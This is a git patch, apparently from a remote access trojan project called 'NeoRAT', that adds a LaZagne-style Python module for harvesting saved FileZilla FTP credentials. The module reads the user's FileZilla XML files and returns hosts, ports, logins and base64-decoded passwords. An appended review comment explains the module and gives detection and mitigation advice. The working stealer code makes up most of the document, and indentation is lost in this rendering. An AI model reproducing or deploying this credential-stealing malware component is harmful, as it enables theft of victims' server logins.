From 20dbeb2f38684c65ff0a4b99012c161295708e88 Mon Sep 17 00:00:00 2001
From: AL-LCL
Date: Fri, 19 May 2023 11:01:49 +0200
Subject: NeoRAT
---
.../lazagne/softwares/sysadmin/filezilla.py | 53 ++++++++++++++++++++++
1 file changed, 53 insertions(+)
create mode 100644 foreign/client_handling/lazagne/softwares/sysadmin/filezilla.py
(limited to 'foreign/client_handling/lazagne/softwares/sysadmin/filezilla.py')
diff --git a/foreign/client_handling/lazagne/softwares/sysadmin/filezilla.py b/foreign/client_handling/lazagne/softwares/sysadmin/filezilla.py
new file mode 100644
index 0000000..fb6d929
--- /dev/null
+++ b/foreign/client_handling/lazagne/softwares/sysadmin/filezilla.py
@@ -0,0 +1,53 @@
+# -*- coding: utf-8 -*-
+import base64
+
+from xml.etree.cElementTree import ElementTree
+
+from foreign.client_handling.lazagne.config.module_info import ModuleInfo
+from foreign.client_handling.lazagne.config.constant import constant
+
+import os
+
+
+class Filezilla(ModuleInfo):
+ def __init__(self):
+ ModuleInfo.__init__(self, 'filezilla', 'sysadmin')
+
+ def run(self):
+ path = os.path.join(constant.profile['APPDATA'], u'FileZilla')
+ if os.path.exists(path):
+ pwd_found = []
+ for file in [u'sitemanager.xml', u'recentservers.xml', u'filezilla.xml']:
+
+ xml_file = os.path.join(path, file)
+ if os.path.exists(xml_file):
+ tree = ElementTree(file=xml_file)
+ if tree.findall('Servers/Server'):
+ servers = tree.findall('Servers/Server')
+ else:
+ servers = tree.findall('RecentServers/Server')
+
+ for server in servers:
+ host = server.find('Host')
+ port = server.find('Port')
+ login = server.find('User')
+ password = server.find('Pass')
+
+ # if all((host, port, login)) does not work
+ if host is not None and port is not None and login is not None:
+ values = {
+ 'Host': host.text,
+ 'Port': port.text,
+ 'Login': login.text,
+ }
+
+ if password is not None:
+ if 'encoding' in password.attrib and password.attrib['encoding'] == 'base64':
+ values['Password'] = base64.b64decode(password.text)
+ else:
+ values['Password'] = password.text
+
+ if values:
+ pwd_found.append(values)
+
+ return pwd_found
--
cgit v1.2.3
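Review bot: The new `Filezilla.run()` collects stored FTP credentials, yet neither the commit (subject "NeoRAT", no body) nor the file says so; a header such as `# Collects saved FileZilla site credentials (Host/Port/User/Pass); the returned list is secret material.` would make the module's purpose auditable. The `Pass` branch shows why these files are sensitive: a value tagged `encoding="base64"` is recovered with a plain `base64.b64decode`, so the stored form is encoded rather than encrypted and is readable by any process running as the user. For defenders, reads of `sitemanager.xml`, `recentservers.xml` or `filezilla.xml` under the profile's `FileZilla` directory by a process other than FileZilla are a useful detection signal. Enabling FileZilla's master password (or not saving passwords) removes the plaintext-equivalent store, and credentials on any host where this ran should be rotated. Indentation was lost in this rendering, so block scoping (for example where `return pwd_found` sits) cannot be checked from the page.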